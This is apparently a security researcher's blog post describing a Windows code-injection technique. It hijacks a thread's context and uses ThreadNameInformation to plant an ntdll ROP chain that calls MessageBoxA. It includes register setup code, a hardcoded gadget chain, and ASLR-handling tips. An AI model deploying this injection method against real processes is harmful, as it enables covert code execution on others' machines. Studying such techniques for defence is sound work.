Shellcode injection using ThreadNameInformation

I've recently been looking into NtSetContextThread as an exploit vector, and was looking at different ways of setting up state to load some code into our target thread and then execute it. The idea of ghost writing is pretty fun, but I wanted a way to do this in a single shot instead of having to loop over and have the thread otherwise in a waiting pattern (since we can't do anything useful when the thread is in a syscall).

Enter NtSetInformationThread(ThreadNameInformation). Blah Cats wrote a piece on using this to allocate kernel pages and get a peek into where a thread's KTHREAD is stored, but we can also use this as an easy way to get data into a target thread. This is set up as a UNICODE_STRING in memory, which means we don't need to care about null-termination, we just provide a length and it copies the whole chunk with a memmove() both when setting it and retrieving it. We can then use NtSetContextThread() to make the app jump to a call to NtQueryInformationThread(ThreadNameInformation), and if we set the stack right we can effectively overflow our own stack and return directly into the start of our ROP chain.

As usual, if you're following along at home you'll want a Windows 10 x64 kernel 20H2. Full PoC at https://github.com/samrussell/doublebarrell

Retrieving the ROP chain

The call to NtQueryInformationThread looks like this:

__kernel_entry NTSTATUS NtQueryInformationThread(
  [in]            HANDLE          ThreadHandle,
  [in]            THREADINFOCLASS ThreadInformationClass,
  [in, out]       PVOID           ThreadInformation,
  [in]            ULONG           ThreadInformationLength,
  [out, optional] PULONG          ReturnLength
);

We can set the first 4 parameters to registers with NtSetContextThread(), but the 5th one is a challenge. This is passed on the stack, and if it's set to 0 it's ignored, but if it's non-null then the call will dereference it to store the number of bytes copied. We aren't reading or writing memory directly so we have no guarantees of the state of the stack, so we have to find a way to set this ourselves.

Luckily for us, ntdll calls this in a bunch of different places. In nearly all of them it sets up the stack parameter first and then nukes all the volatile registers (bad), but there is one spot in DbgUiConvertStateChangeStructureWorker() where it sets up the volatile registers and then loads the stack parameter:

So we can set the 5 parameters in RCX, RDX, R8, R9 and RDI, set RIP to 1800CC777 (relocated), and this will load RDI at [RSP+20] and then call NtQueryInformationThread.

One last thing is to carefully set the ThreadInformation parameter so it overrides our return address on the stack. NtQueryInformationThread() will write a UNICODE_STRING structure, which is 2 WORDs with length and maximum length, and then an aligned pointer to our buffer, followed by the buffer itself. When we make the call we'll push another pointer onto the stack, so we need to load this at current RSP - 3x sizeof(void*)

context.ContextFlags = CONTEXT_FULL;
GetThreadContext(hThread, &context);
context.ContextFlags |= 0x03;

context.Rsp = context.Rsp - 0x200 - sizeof(threadName); // make space on the stack
context.Rcx = 0xFFFFFFFFFFFFFFFE; // -2 = current thread
context.Rdx = 0x26; // ThreadNameInformation
context.R8 = context.Rsp - 0x18; // overflow ourselves
context.R9 = (threadInformation[0] & 0xFFFF) + 0x10; // length
context.Rdi = 0; // NULL, don't update us
context.Rip = 0x7FFEE4F5C777; // relocated pointer
SetThreadContext(hThread, &context);

So we set this up, and our target thread is straight into our ROP chain and will do what we like! Now for the proof of concept.

Shellcode courtesy of ntdll

At this point we search for gadgets that will let us pull the PEB out of GS:30 plus a bunch of other arithmetic to locate LoadLibrary and GetProcAddress. This gives us a big ugly ROP chain and requires a lot of gadgets to make it work. With ntdll we get a headstart with RtlGetCurrentPeb(), but we still need a bunch of gadgets that do stuff to RAX and return, as well as ways to store our data in non-volatile registers for later. I had a browse with ROPgadget and wasn't happy with what I found, but then I realized that ntdll is actually all we need and we don't need any arithmetic at all.

LoadLibrary -> LdrLoadDll

If we pull open kernelbase.dll we find that all roads lead to LoadLibraryExW() which then calls LdrLoadDll() in ntdll. According to ntinternals.net, we can call it as follows:

LdrLoadDll(
    0, // optional
    0, // optional
    &filename, // UNICODE_STRING
    &baseAddress // void* that receives the module address
)

The awesome thing with this is that baseAddress gets stored to a pointer of our choosing, so we can just point this to further down our ROPchain and it'll automatically get loaded into a register later on. Easy.

GetProcAddress -> LdrGetProcedureAddressForCaller()

That's right, GetProcAddress() is also backed by a function in ntdll. The LdrGetProcedureAddressForCaller() function takes 6 params but there's another function that wraps it called LdrGetProcedureAddress() that only takes 4:

LdrGetProcedureAddress(
    &baseAddress, // address we got from LdrLoadDll()
    &procName, // a STRING with the name of the function we want
    0, // ordinal, given we're tailoring this to a specific build we can use this if we like
    &procAddress // void* that receives the function address

As with LdrLoadDll(), the last parameter is a pointer to where the function address will be stored, so this can point right back into our ROP chain too. All we need now is a couple of gadgets and we'll be sorted.

LdrpHandleInvalidUserCallTarget: the mother of all gadgets

All of this is static - we know our pointers, we know our arguments, and the two functions we call are loading the arguments right into our ROP chain. All we need now is a way to populate our volatile registers for parameters 1-4. Enter my favorite function in ntdll: LdrpHandleInvalidUserCallTarget(). I don't know what this does, and I don't really care, but what I do care about is that it populates all of the registers we care about before returning:

So whenever we want to call a function we just need to set up the stack like this:

address of LdrpHandleInvalidUserCallTarget gadget
param 2 (RDX)
param 1 (RCX)
param 3 (R8)
param 4 (R9)
null (R10)
null (R11)
function we want to call
address of return gadget
4x QWORD for shadow stack

I've also kept my data inline with my calls and just step over it when I'm done with it, and this gadget lets us dump up to 7 QWORDs at a time from the stack.

Putting it all together

Here's the full ROP chain I use to inject a MessageBox call:

    // set up shellcode

    threadName[0] = 0x7FFEE4F1C550; // populate registers
    threadName[1] = 0;
    threadName[2] = 0;
    threadName[3] = context.R8 + 0x80; // &UNICODE_STRING("ntdll.dll")
    threadName[4] = context.R8 + 0xB8; // &baseAddress
    threadName[5] = 0;
    threadName[6] = 0;
    threadName[7] = 0x7FFEE4EA6A10; // LdrLoadDll
    threadName[8] = 0x7FFEE4F1C553; // pop 4 registers
    // shadow stack break
    threadName[13] = 0x7FFEE4F1C551; // pop 5 registers
    threadName[14] = 0x0000000000160014; // UNICODE_STRING("ntdll.dll")
    threadName[15] = context.R8 + 0x90;
    threadName[16] = 0x0072006500730075;
    threadName[17] = 0x0064002E00320033;
    threadName[18] = 0x00000000006C006C;
    threadName[19] = 0x7FFEE4F1C550; // populate registers
    threadName[20] = context.R8 + 0x120; &STRING("MessageBoxA")
    threadName[21] = 0;
    threadName[22] = 0;
    threadName[23] = context.R8 + 0x178; // &procAddress
    threadName[24] = 0;
    threadName[25] = 0;
    threadName[26] = 0x7FFEE4F11AD0; // LdrGetProcedureAddress
    threadName[27] = 0x7FFEE4F1C551; // pop 5 registers (shadow stack + 1xQWORD for alignment)
    // shadow stack break
    threadName[33] = 0x7FFEE4F1C553; // pop 4 registers
    threadName[34] = 0x00000000000C000B; // STRING("MessageBoxA")
    threadName[35] = context.R8 + 0x130;
    threadName[36] = 0x426567617373654D;
    threadName[37] = 0x000000000041786F;
    threadName[38] = 0x7FFEE4F1C550; // populate registers
    threadName[39] = context.R8 + 0x188; // &message
    threadName[40] = 0;
    threadName[41] = context.R8 + 0x190; // &caption
    threadName[42] = 0;
    threadName[43] = 0;
    threadName[44] = 0;
    threadName[45] = 0; // MessageBoxA
    threadName[46] = 0x7FFEE4E9DD1B; // infinite loop gadget (0xEB 0xFE) for debugging
    threadName[47] = 0x00313144454E5750;
    threadName[48] = 0x00747577206C6F6C;

All done!

A note on alignment

MessageBoxA() is one of those annoying functions that backs up the XMM registers and just assumes the stack is 16-byte aligned. I've skipped over the details on this but you'll need to keep this in mind whenever you're building ROP chains that operate on anything that needs to be 16-byte aligned.

Next steps

I've been testing this on easy mode (on a binary that has an infinite loop so doesn't end up in a syscall when we call NtSetContextThread(), and doesn't appear to have ASLR enabled). We also jump out to an infinite loop gadget at the end to avoid cleanup.

Identifying and returning from a syscall

There are a few ways to figure this out, RCX and R10 have some good clues, RAX will be set to a low value corresponding to the syscall number, and RIP should be quite high. We actually want to catch the thread in a syscall though, as this gives us a bunch of clues for where to offset our gadgets from. As mentioned in NINA, we can always set RIP to an infinite loop split instruction and jump out there (ntdll has tons to choose from) - once we're there we can do a second call to kick off our injection. You'll want to store RAX after relocating to the infinite loop as you'll need to put this back when cleaning up (the RAX you picked up in the syscall is there before the syscall itself returns).

Handling ASLR

The advantage of getting the thread context while it's in a syscall is that we know what it was called with (RAX), and the return address (RIP), which means we know exactly which function in ntdll was hit. We can then lookup the RVA, subtract it from RIP and we have the base of ntdll and can use that to adjust the addresses for our gadgets and function calls.

Cleaning up

Unless your target thread has been naughty and stored data below RSP, all you need to do is fixup RSP, RAX and RIP. Everything else that we clobbered also gets clobbered in a syscall so we don't care. We've left all our strings and gadget addresses in stack memory, so you're welcome to zero it out if you care, but that's an exercise for the reader.

Sauce

PoC at https://github.com/samrussell/doublebarrell

Happy hacking!

Shellcode injection using ThreadNameInformation

Retrieving the ROP chain

Shellcode courtesy of ntdll

LoadLibrary -> LdrLoadDll

GetProcAddress -> LdrGetProcedureAddressForCaller()

LdrpHandleInvalidUserCallTarget: the mother of all gadgets

Putting it all together

A note on alignment

Next steps

Identifying and returning from a syscall

Handling ASLR

Cleaning up

Sauce

Comments

More from this blog

Binary Ninja Workflows: Fixing branch obfuscation

Control Flow Flattening: How to build your own

Removing Control Flow Flattening with Binary Ninja

Bypassing app protection using proxy DLLs

Extracting VMProtect handlers with Binary Ninja

Command Palette

Retrieving the ROP chain

Shellcode courtesy of ntdll

LoadLibrary -> LdrLoadDll

GetProcAddress -> LdrGetProcedureAddressForCaller()

LdrpHandleInvalidUserCallTarget: the mother of all gadgets

Putting it all together

A note on alignment

Next steps

Identifying and returning from a syscall

Handling ASLR

Cleaning up

Sauce

Comments

More from this blog